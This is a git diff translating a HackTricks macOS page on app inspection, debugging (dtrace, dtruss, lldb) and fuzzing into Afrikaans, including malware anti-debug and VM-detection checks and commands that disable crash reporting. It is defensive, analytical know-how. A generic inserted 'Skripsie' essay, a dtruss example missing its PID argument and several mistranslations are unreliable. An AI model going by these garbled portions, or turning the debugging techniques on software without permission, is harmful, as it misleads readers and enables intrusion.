-Right clicking in a code object you can see **references to/from that object** or even change its name (this doesn't work in decompiled pseudocode): +Deur met die rechtermuisknop op 'n kode-object te klik, kan jy **verwysings na/van daardie objek** sien of selfs sy naam verander (dit werk nie in ontsommelde pseudokode nie):
-Moreover, in the **middle down you can write python commands**. +Verder kan jy in die **middelste onderste deel Python-opdragte skryf**. -#### Right panel +#### Regter paneel -In the right panel you can see interesting information such as the **navigation history** (so you know how you arrived at the current situation), the **call grap**h where you can see all the **functions that call this function** and all the functions that **this function calls**, and **local variables** information. +In die regter paneel kan jy interessante inligting sien soos die **navigasiegeskiedenis** (sodat jy weet hoe jy by die huidige situasie uitgekom het), die **oproepgrafiek** waar jy al die **funksies kan sien wat hierdie funksie oproep** en al die funksies wat **hierdie funksie oproep**, en inligting oor **plaaslike veranderlikes**. ### dtrace -It allows users access to applications at an extremely **low level** and provides a way for users to **trace** **programs** and even change their execution flow. Dtrace uses **probes** which are **placed throughout the kernel** and are at locations such as the beginning and end of system calls. +Dit stel gebruikers in staat om toepassings op 'n uiters **lae vlak** te benader en bied 'n manier vir gebruikers om **programme te volg** en selfs hul uitvoeringsvloei te **verander**. Dtrace gebruik **sondes** wat **regdeur die kernel geplaas** word en op plekke soos die begin en einde van stelseloproepe is. -DTrace uses the **`dtrace_probe_create`** function to create a probe for each system call. These probes can be fired in the **entry and exit point of each system call**. The interaction with DTrace occur through /dev/dtrace which is only available for the root user. +DTrace gebruik die **`dtrace_probe_create`**-funksie om 'n sonde vir elke stelseloproep te skep. Hierdie sonde kan by die **intree- en uittreepunt van elke stelseloproep** geaktiveer word. Die interaksie met DTrace vind plaas deur middel van /dev/dtrace wat slegs beskikbaar is vir die root-gebruiker. {% hint style="success" %} -To enable Dtrace without fully disabling SIP protection you could execute on recovery mode: `csrutil enable --without dtrace` +Om Dtrace te aktiveer sonder om SIP-beskerming heeltemal te deaktiveer, kan jy in herstelmodus uitvoer: `csrutil enable --without dtrace` -You can also **`dtrace`** or **`dtruss`** binaries that **you have compiled**. +Jy kan ook **`dtrace`** of **`dtruss`** binaire lêers wat **jy self saamgestel het**, gebruik. {% endhint %} -The available probes of dtrace can be obtained with: - +Die beskikbare sonde van dtrace kan verkry word met: ```bash dtrace -l | head - ID PROVIDER MODULE FUNCTION NAME - 1 dtrace BEGIN - 2 dtrace END - 3 dtrace ERROR - 43 profile profile-97 - 44 profile profile-199 +ID PROVIDER MODULE FUNCTION NAME +1 dtrace BEGIN +2 dtrace END +3 dtrace ERROR +43 profile profile-97 +44 profile profile-199 ``` +Die ondersoeknaam bestaan uit vier dele: die verskaffer, module, funksie en naam (`fbt:mach_kernel:ptrace:entry`). As jy nie 'n deel van die naam spesifiseer nie, sal Dtrace daardie deel as 'n wildcard toepas. -The probe name consists of four parts: the provider, module, function, and name (`fbt:mach_kernel:ptrace:entry`). If you not specifies some part of the name, Dtrace will apply that part as a wildcard. +Om DTrace te konfigureer om ondersoeke te aktiveer en om te spesifiseer watter aksies uitgevoer moet word wanneer hulle aktiveer, sal ons die D-taal moet gebruik. -To configure DTrace to activate probes and to specify what actions to perform when they fire, we will need to use the D language. +'n Meer gedetailleerde verduideliking en meer voorbeelde kan gevind word in [https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html) -A more detailed explanation and more examples can be found in [https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html) +#### Voorbeelde -#### Examples - -Run `man -k dtrace` to list the **DTrace scripts available**. Example: `sudo dtruss -n binary` - -* In line +Voer `man -k dtrace` uit om die **DTrace-skrips beskikbaar** te lys. Voorbeeld: `sudo dtruss -n binary` +* Op lyn ```bash #Count the number of syscalls of each running process sudo dtrace -n 'syscall:::entry {@[execname] = count()}' ``` +# Skripsie -* script +Hierdie is 'n skripsie oor die inspekteer, foutopsporing en fuzzing van macOS-toepassings. Hierdie tegnieke kan gebruik word om die sekuriteit van macOS-toepassings te verbeter en voorregverhoging te bereik. +## Inspekteer + +By die inspekteer van 'n macOS-toepassing, kan jy die toepassing se bronkode, afhanklikhede en ander relevante inligting ontleed. Hier is 'n paar tegnieke wat jy kan gebruik: + +### 1. Disassembling + +Deur die toepassing te disassembleer, kan jy die masjienkode ontleed en die programlogika verstaan. Jy kan hulpmiddels soos `Hopper Disassembler` of `IDA Pro` gebruik om hierdie taak uit te voer. + +### 2. Dynamic Analysis + +Deur die toepassing dinamies te analiseer, kan jy sy gedrag tydens uitvoering bestudeer. Jy kan hulpmiddels soos `lldb` of `gdb` gebruik om die toepassing te ontleed en te monitor terwyl dit uitgevoer word. + +### 3. Reverse Engineering + +Deur die toepassing te herontwerp, kan jy die oorspronklike bronkode herstel. Jy kan hulpmiddels soos `class-dump` of `Hopper Disassembler` gebruik om die toepassing se klassedefinisies en metodes te ontleed. + +## Foutopsporing + +Foutopsporing is 'n belangrike tegniek om probleme in 'n toepassing te identifiseer en op te los. Hier is 'n paar tegnieke wat jy kan gebruik: + +### 1. Logging + +Deur logboeke in die toepassing in te skakel, kan jy nuttige inligting oor die toepassing se uitvoering versamel. Jy kan die `NSLog`-funksie gebruik om logboekinskrywings te skep en die `Console`-toepassing gebruik om die logboeke te monitor. + +### 2. Breakpoints + +Deur breekpunte in die toepassing te plaas, kan jy die uitvoering stop en die toestand van die toepassing ondersoek. Jy kan hulpmiddels soos `lldb` of `gdb` gebruik om breekpunte te plaas en die toepassing te ontleed terwyl dit uitgevoer word. + +### 3. Memory Analysis + +Deur die geheue van die toepassing te analiseer, kan jy probleme soos geheuelekke of ongeldige geheueverwysings identifiseer. Jy kan hulpmiddels soos `Instruments` of `Valgrind` gebruik om hierdie analise uit te voer. + +## Fuzzing + +Fuzzing is 'n tegniek wat gebruik word om die toepassing te toets deur ongeldige of lukrake insette te voorsien. Hier is 'n paar tegnieke wat jy kan gebruik: + +### 1. Input Mutation + +Deur die insette van die toepassing te muteer, kan jy verskillende scenario's simuleer en potensiële probleme identifiseer. Jy kan hulpmiddels soos `AFL` of `Radamsa` gebruik om die insette te muteer. + +### 2. Protocol Fuzzing + +Deur die kommunikasieprotokolle van die toepassing te fuzz, kan jy die toepassing se reaksie op ongeldige of onverwagte protokolopdragte toets. Jy kan hulpmiddels soos `Sulley` of `Peach` gebruik om hierdie tipe fuzzing uit te voer. + +### 3. File Fuzzing + +Deur lukrake of ongeldige lêers as insette te gebruik, kan jy die toepassing se hantering van lêers toets. Jy kan hulpmiddels soos `zzuf` of `Atheris` gebruik om hierdie tipe fuzzing uit te voer. + +Met hierdie inspekteer-, foutopsporing- en fuzzingtegnieke kan jy die sekuriteit van macOS-toepassings verbeter en voorregverhoging bereik. Dit is belangrik om hierdie tegnieke verantwoordelik en eties te gebruik. ```bash syscall:::entry /pid == $1/ @@ -271,17 +304,17 @@ syscall:::entry } #Log every syscall of a PID -sudo dtrace -s script.d 1234 +sudo dtrace -s script.d 1234 ``` ```bash syscall::open:entry { - printf("%s(%s)", probefunc, copyinstr(arg0)); +printf("%s(%s)", probefunc, copyinstr(arg0)); } syscall::close:entry { - printf("%s(%d)\n", probefunc, arg0); +printf("%s(%d)\n", probefunc, arg0); } #Log files opened and closed by a process @@ -291,100 +324,105 @@ sudo dtrace -s b.d -c "cat /etc/hosts" ```bash syscall:::entry { - ; +; } syscall:::return { - printf("=%d\n", arg1); +printf("=%d\n", arg1); } #Log sys calls with values sudo dtrace -s syscalls_info.d -c "cat /etc/hosts" ``` - ### dtruss +`dtruss` is a command-line tool available on macOS that allows you to trace and inspect system calls made by an application. It can be used for debugging and analyzing the behavior of macOS applications. + +To use `dtruss`, you need to run it with the target application as an argument. It will then display a list of system calls made by the application, along with their arguments and return values. This can be useful for understanding how an application interacts with the operating system and identifying any potential security vulnerabilities or performance issues. + +Here is an example of how to use `dtruss`: + +```bash +$ sudo dtruss -f -p +``` + +In this command, `-f` specifies that `dtruss` should follow child processes, and `-p ` specifies the process ID of the target application. Running `dtruss` with these options will display a live stream of system calls made by the application. + +Keep in mind that `dtruss` requires root privileges to run, so you may need to use `sudo` to execute it. Additionally, it is important to only use `dtruss` on applications that you have permission to inspect, as it can potentially expose sensitive information. + +Overall, `dtruss` is a powerful tool for inspecting and debugging macOS applications. By tracing system calls, you can gain valuable insights into an application's behavior and identify potential security issues. ```bash dtruss -c ls #Get syscalls of ls dtruss -c -p 1000 #get syscalls of PID 1000 ``` - ### ktrace -You can use this one even with **SIP activated** - +Jy kan dit selfs gebruik met **SIP geaktiveer** ```bash ktrace trace -s -S -t c -c ls | grep "ls(" ``` - ### ProcessMonitor -[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is a very useful tool to check the process related actions a process is performing (for example, monitor which new processes a process is creating). +[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is 'n baie nuttige instrument om die prosesverwante aksies wat 'n proses uitvoer te monitor (byvoorbeeld, om te monitor watter nuwe prosesse 'n proses skep). ### SpriteTree -[**SpriteTree**](https://themittenmac.com/tools/) is a tool to prints the relations between processes.\ -You need to monitor your mac with a command like **`sudo eslogger fork exec rename create > cap.json`** (the terminal launching this required FDA). And then you can load the json in this tool to viwe all the relations: +[**SpriteTree**](https://themittenmac.com/tools/) is 'n instrument wat die verhoudings tussen prosesse afdruk.\ +Jy moet jou Mac monitor met 'n bevel soos **`sudo eslogger fork exec rename create > cap.json`** (die terminal wat dit lanceer, vereis FDA). En dan kan jy die json in hierdie instrument laai om al die verhoudings te sien:
### FileMonitor -[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events. +[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) maak dit moontlik om lêer-gebeure (soos skepping, wysigings en verwyderings) te monitor en bied gedetailleerde inligting oor sulke gebeure. ### Crescendo -[**Crescendo**](https://github.com/SuprHackerSteve/Crescendo) is a GUI tool with the look and feel Windows users may know from Microsoft Sysinternal’s _Procmon_. This tool allows the recording of various event types to be started and stopped, allows for the filtering of these events by categories such as file, process, network, etc., and provides the functionality to save the events recorded in a json format. +[**Crescendo**](https://github.com/SuprHackerSteve/Crescendo) is 'n GUI-instrument met die voorkoms en gevoel wat Windows-gebruikers mag ken van Microsoft Sysinternal se _Procmon_. Hierdie instrument maak dit moontlik om die opname van verskillende tipes gebeure te begin en te stop, maak dit moontlik om hierdie gebeure te filter volgens kategorieë soos lêer, proses, netwerk, ens., en bied die funksionaliteit om die opgeneemde gebeure in 'n json-formaat te stoor. ### Apple Instruments -[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) are part of Xcode’s Developer tools – used for monitoring application performance, identifying memory leaks and tracking filesystem activity. +[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) is deel van Xcode se Ontwikkelaarshulpmiddels - dit word gebruik om programprestasie te monitor, geheuelekasies te identifiseer en lêersisteemaktiwiteit te volg. ![](<../../../.gitbook/assets/image (15).png>) ### fs\_usage -Allows to follow actions performed by processes: - +Maak dit moontlik om aksies wat deur prosesse uitgevoer word, te volg: ```bash fs_usage -w -f filesys ls #This tracks filesystem actions of proccess names containing ls fs_usage -w -f network curl #This tracks network actions ``` - ### TaskExplorer -[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is useful to see the **libraries** used by a binary, the **files** it's using and the **network** connections.\ -It also checks the binary processes against **virustotal** and show information about the binary. +[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is nuttig om die **biblioteke** wat deur 'n binêre lêer gebruik word, die **lêers** wat dit gebruik en die **netwerk**-verbindings te sien.\ +Dit kontroleer ook die binêre prosesse teen **virustotal** en wys inligting oor die binêre lêer. ## PT\_DENY\_ATTACH -In [**this blog post**](https://knight.sc/debugging/2019/06/03/debugging-apple-binaries-that-use-pt-deny-attach.html) you can find an example about how to **debug a running daemon** that used **`PT_DENY_ATTACH`** to prevent debugging even if SIP was disabled. +In [**hierdie blogpos**](https://knight.sc/debugging/2019/06/03/debugging-apple-binaries-that-use-pt-deny-attach.html) kan jy 'n voorbeeld vind oor hoe om 'n lopende daemon te **debug** wat **`PT_DENY_ATTACH`** gebruik om te voorkom dat dit gedebug word, selfs as SIP gedeaktiveer is. ### lldb -**lldb** is the de **facto tool** for **macOS** binary **debugging**. - +**lldb** is die de **facto-hulpmiddel** vir **macOS** binêre **debugging**. ```bash lldb ./malware.bin lldb -p 1122 lldb -n malware.bin lldb -n malware.bin --waitfor ``` - -You can set intel flavour when using lldb creating a file called **`.lldbinit`** in your home folder with the following line: - +Jy kan die intel-flavour instel wanneer jy lldb gebruik deur 'n lêer genaamd **`.lldbinit`** in jou tuisgids te skep met die volgende lyn: ```bash settings set target.x86-disassembly-flavor intel ``` - {% hint style="warning" %} -Inside lldb, dump a process with `process save-core` +Binne lldb, dump 'n proses met `process save-core` {% endhint %} -
(lldb) CommandDescription
run (r)Starting execution, which will continue unabated until a breakpoint is hit or the process terminates.
continue (c)Continue execution of the debugged process.
nexti (n / ni)Execute the next instruction. This command will skip over function calls.
stepi (s / si)Execute the next instruction. Unlike the nexti command, this command will step into function calls.
finish (f)Execute the rest of the instructions in the current function (“frame”) return and halt.
control + cPause execution. If the process has been run (r) or continued (c), this will cause the process to halt ...wherever it is currently executing.
breakpoint (b)

b main #Any func called main

b <binname>`main #Main func of the bin

b set -n main --shlib <lib_name> #Main func of the indicated bin

b -[NSDictionary objectForKey:]

b -a 0x0000000100004bd9

br l #Breakpoint list

br e/dis <num> #Enable/Disable breakpoint

breakpoint delete <num>

help

help breakpoint #Get help of breakpoint command

help memory write #Get help to write into the memory

reg

reg read

reg read $rax

reg read $rax --format <format>

reg write $rip 0x100035cc0

x/s <reg/memory address>Display the memory as a null-terminated string.
x/i <reg/memory address>Display the memory as assembly instruction.
x/b <reg/memory address>Display the memory as byte.
print object (po)

This will print the object referenced by the param

po $raw

{

dnsChanger = {

"affiliate" = "";

"blacklist_dns" = ();

Note that most of Apple’s Objective-C APIs or methods return objects, and thus should be displayed via the “print object” (po) command. If po doesn't produce a meaningful output use x/b

memorymemory read 0x000....
memory read $x0+0xf2a
memory write 0x100600000 -s 4 0x41414141 #Write AAAA in that address
memory write -f s $rip+0x11f+7 "AAAA" #Write AAAA in the addr
disassembly

dis #Disas current function

dis -n <funcname> #Disas func

dis -n <funcname> -b <basename> #Disas func
dis -c 6 #Disas 6 lines
dis -c 0x100003764 -e 0x100003768 # From one add until the other
dis -p -c 4 # Start in current address disassembling

parrayparray 3 (char **)$x1 # Check array of 3 components in x1 reg
+
(lldb) OpdragBeskrywing
run (r)Begin uitvoering, wat ononderbroke sal voortgaan totdat 'n breekpunt getref word of die proses beëindig word.
continue (c)Gaan voort met die uitvoering van die gedebugde proses.
nexti (n / ni)Voer die volgende instruksie uit. Hierdie opdrag sal oorslaan oor funksie-oproepe.
stepi (s / si)Voer die volgende instruksie uit. In teenstelling met die nexti-opdrag, sal hierdie opdrag in funksie-oproepe stap.
finish (f)Voer die res van die instruksies in die huidige funksie ("raam") uit en hou op.
control + cOnderbreek uitvoering. As die proses uitgevoer (r) of voortgesit (c) is, sal dit die proses laat staan ​​... waar dit tans uitgevoer word.
breakpoint (b)

b main #Enige funksie genaamd main

b <binname>`main #Hooffunksie van die bin

b set -n main --shlib <lib_name> #Hooffunksie van die aangeduide bin

b -[NSDictionary objectForKey:]

b -a 0x0000000100004bd9

br l #Breekpuntlys

br e/dis <num> #Aktiveer/Deaktiveer breekpunt

breakpoint delete <num>

help

help breakpoint #Kry hulp van breekpunt-opdrag

help memory write #Kry hulp om in die geheue te skryf

reg

reg read

reg read $rax

reg read $rax --format <formaat>

reg write $rip 0x100035cc0

x/s <reg/geheue-adres>Vertoon die geheue as 'n null-geëindigde string.
x/i <reg/geheue-adres>Vertoon die geheue as 'n samestellingsinstruksie.
x/b <reg/geheue-adres>Vertoon die geheue as 'n byte.
print object (po)

Dit sal die voorwerp wat deur die parameter verwys word, druk

po $raw

{

dnsChanger = {

"affiliate" = "";

"blacklist_dns" = ();

Merk op dat die meeste van Apple se Objective-C API's of metodes voorwerpe teruggee, en dus vertoon moet word deur middel van die "print object" (po) opdrag. As po nie 'n betekenisvolle uitset lewer nie, gebruik x/b

memorymemory read 0x000....
memory read $x0+0xf2a
memory write 0x100600000 -s 4 0x41414141 #Skryf AAAA in daardie adres
memory write -f s $rip+0x11f+7 "AAAA" #Skryf AAAA in die adres
disassembly

dis #Ontas huidige funksie

dis -n <funcname> #Ontas funksie

dis -n <funcname> -b <basename> #Ontas funksie
dis -c 6 #Ontas 6 lyne
dis -c 0x100003764 -e 0x100003768 # Van die een adres tot die ander
dis -p -c 4 # Begin by huidige adres ontleed

parrayparray 3 (char **)$x1 #Kontroleer reeks van 3 komponente in x1-reg
{% hint style="info" %} -When calling the **`objc_sendMsg`** function, the **rsi** register holds the **name of the method** as a null-terminated (“C”) string. To print the name via lldb do: +Wanneer die **`objc_sendMsg`**-funksie geroep word, hou die **rsi**-register die **naam van die metode** as 'n null-geëindigde ("C") string. Om die naam via lldb af te druk, doen die volgende: `(lldb) x/s $rsi: 0x1000f1576: "startMiningWithPort:password:coreCount:slowMemory:currency:"` @@ -394,30 +432,28 @@ When calling the **`objc_sendMsg`** function, the **rsi** register holds the **n `(lldb) reg read $rsi: rsi = 0x00000001000f1576 "startMiningWithPort:password:coreCount:slowMemory:currency:"` {% endhint %} -### Anti-Dynamic Analysis +### Anti-Dinamiese Analise -#### VM detection - -* The command **`sysctl hw.model`** returns "Mac" when the **host is a MacOS** but something different when it's a VM. -* Playing with the values of **`hw.logicalcpu`** and **`hw.physicalcpu`** some malwares try to detect if it's a VM. -* Some malwares can also **detect** if the machine is **VMware** based on the MAC address (00:50:56). -* It's also possible to find **if a process is being debugged** with a simple code such us: - * `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //process being debugged }` -* It can also invoke the **`ptrace`** system call with the **`PT_DENY_ATTACH`** flag. This **prevents** a deb**u**gger from attaching and tracing. - * You can check if the **`sysctl`** or **`ptrace`** function is being **imported** (but the malware could import it dynamically) - * As noted in this writeup, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\ - “_The message Process # exited with **status = 45 (0x0000002d)** is usually a tell-tale sign that the debug target is using **PT\_DENY\_ATTACH**_” +#### VM-opsporing +* Die opdrag **`sysctl hw.model`** gee "Mac" terug as die **gasheer 'n MacOS** is, maar iets anders as dit 'n VM is. +* Deur te speel met die waardes van **`hw.logicalcpu`** en **`hw.physicalcpu`** probeer sommige kwaadwillige programme om te bepaal of dit 'n VM is. +* Sommige kwaadwillige programme kan ook **vasstel of die masjien VMware-gebaseer** is op grond van die MAC-adres (00:50:56). +* Dit is ook moontlik om vas te stel of 'n proses gedebugeer word met 'n eenvoudige kode soos: +* `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //proses word gedebugeer }` +* Dit kan ook die **`ptrace`**-sisteemaanroep met die **`PT_DENY_ATTACH`**-vlag aanroep. Dit **voorkom** dat 'n deb**u**gger kan koppel en naspeur. +* Jy kan nagaan of die **`sysctl`**- of **`ptrace`**-funksie **ingevoer** word (maar die kwaadwillige program kan dit dinamies invoer) +* Soos opgemerk in hierdie uiteensetting, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\ +"_Die boodskap Process # exited with **status = 45 (0x0000002d)** is gewoonlik 'n duidelike teken dat die doelwit van die debuut **PT\_DENY\_ATTACH** gebruik_" ## Fuzzing ### [ReportCrash](https://ss64.com/osx/reportcrash.html) -ReportCrash **analyzes crashing processes and saves a crash report to disk**. A crash report contains information that can **help a developer diagnose** the cause of a crash.\ -For applications and other processes **running in the per-user launchd context**, ReportCrash runs as a LaunchAgent and saves crash reports in the user's `~/Library/Logs/DiagnosticReports/`\ -For daemons, other processes **running in the system launchd context** and other privileged processes, ReportCrash runs as a LaunchDaemon and saves crash reports in the system's `/Library/Logs/DiagnosticReports` - -If you are worried about crash reports **being sent to Apple** you can disable them. If not, crash reports can be useful to **figure out how a server crashed**. +ReportCrash **ontleed afbrekende prosesse en stoor 'n afbrekingsverslag op die skyf**. 'n Afbrekingsverslag bevat inligting wat 'n ontwikkelaar kan help om die oorsaak van 'n afbreking te diagnoseer.\ +Vir toepassings en ander prosesse **wat in die per-gebruiker launchd konteks loop**, loop ReportCrash as 'n LaunchAgent en stoor afbrekingsverslae in die gebruiker se `~/Library/Logs/DiagnosticReports/`\ +Vir daemons, ander prosesse **wat in die stelsel launchd konteks loop** en ander bevoorregte prosesse, loop ReportCrash as 'n LaunchDaemon en stoor afbrekingsverslae in die stelsel se `/Library/Logs/DiagnosticReports` +As jy bekommerd is oor afbrekingsverslae **wat na Apple gestuur word**, kan jy dit deaktiveer. As nie, kan afbrekingsverslae nuttig wees om **uit te vind hoe 'n bediener afgebreek het**. ```bash #To disable crash reporting: launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist @@ -427,48 +463,43 @@ sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Roo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist ``` +### Slaap -### Sleep - -While fuzzing in a MacOS it's important to not allow the Mac to sleep: +Terwyl jy in 'n MacOS fuzz, is dit belangrik om te verseker dat die Mac nie gaan slaap nie: * systemsetup -setsleep Never -* pmset, System Preferences +* pmset, Sisteemvoorkeure * [KeepingYouAwake](https://github.com/newmarcel/KeepingYouAwake) -#### SSH Disconnect +#### SSH Ontkoppel -If you are fuzzing via a SSH connection it's important to make sure the session isn't going to day. So change the sshd\_config file with: +As jy fuzz via 'n SSH-verbinding, is dit belangrik om seker te maak dat die sessie nie gaan afloop nie. Verander dus die sshd\_config-lêer met: * TCPKeepAlive Yes * ClientAliveInterval 0 * ClientAliveCountMax 0 - ```bash sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist ``` +### Interne Handlers -### Internal Handlers - -**Checkout the following page** to find out how you can find which app is responsible of **handling the specified scheme or protocol:** +**Kyk na die volgende bladsy** om uit te vind watter toepassing verantwoordelik is vir **die hanteer van die gespesifiseerde skema of protokol:** {% content-ref url="../macos-file-extension-apps.md" %} [macos-file-extension-apps.md](../macos-file-extension-apps.md) {% endcontent-ref %} -### Enumerating Network Processes - -This interesting to find processes that are managing network data: +### Enumerating Netwerkprosesse +Dit is interessant om prosesse te vind wat netwerkdata bestuur: ```bash dtrace -n 'syscall::recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' >> recv.log #wait some time sort -u recv.log > procs.txt cat procs.txt ``` - -Or use `netstat` or `lsof` +Of gebruik `netstat` of `lsof` ### Libgmalloc @@ -484,13 +515,13 @@ lldb -o "target create `which some-binary`" -o "settings set target.env-vars DYL #### [AFL++](https://github.com/AFLplusplus/AFLplusplus) -Works for CLI tools +Werk vir CLI-hulpmiddels #### [Litefuzz](https://github.com/sec-tools/litefuzz) -It "**just works"** with macOS GUI tools. Note some some macOS apps have some specific requirements like unique filenames, the right extension, need to read the files from the sandbox (`~/Library/Containers/com.apple.Safari/Data`)... +Dit "**werk net"** met macOS GUI-hulpmiddels. Merk op dat sommige macOS-programme spesifieke vereistes het, soos unieke lêernaam, die regte uitbreiding, die lees van lêers uit die sandput (`~/Library/Containers/com.apple.Safari/Data`)... -Some examples: +Voorbeelde: {% code overflow="wrap" %} ```bash @@ -518,14 +549,14 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash ``` {% endcode %} -### More Fuzzing MacOS Info +### Meer Fuzzing MacOS-inligting * [https://www.youtube.com/watch?v=T5xfL9tEg44](https://www.youtube.com/watch?v=T5xfL9tEg44) * [https://github.com/bnagy/slides/blob/master/OSXScale.pdf](https://github.com/bnagy/slides/blob/master/OSXScale.pdf) * [https://github.com/bnagy/francis/tree/master/exploitaben](https://github.com/bnagy/francis/tree/master/exploitaben) * [https://github.com/ant4g0nist/crashwrangler](https://github.com/ant4g0nist/crashwrangler) -## References +## Verwysings * [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) * [**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44) @@ -534,14 +565,14 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md index 42b035e18..c3cda07da 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md @@ -1,220 +1,186 @@ -# Introduction to ARM64v8 +# Inleiding tot ARM64v8
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## **Exception Levels - EL (ARM64v8)** +## **Uitsonderingsvlakke - EL (ARM64v8)** -In ARMv8 architecture, execution levels, known as Exception Levels (ELs), define the privilege level and capabilities of the execution environment. There are four exception levels, ranging from EL0 to EL3, each serving a different purpose: +In die ARMv8-argitektuur definieer uitvoeringsvlakke, bekend as Uitsonderingsvlakke (EL's), die voorregvlak en vermoëns van die uitvoeringsomgewing. Daar is vier uitsonderingsvlakke, wat wissel van EL0 tot EL3, elk met 'n ander doel: -1. **EL0 - User Mode**: - * This is the least-privileged level and is used for executing regular application code. - * Applications running at EL0 are isolated from each other and from the system software, enhancing security and stability. -2. **EL1 - Operating System Kernel Mode**: - * Most operating system kernels run at this level. - * EL1 has more privileges than EL0 and can access system resources, but with some restrictions to ensure system integrity. -3. **EL2 - Hypervisor Mode**: - * This level is used for virtualization. A hypervisor running at EL2 can manage multiple operating 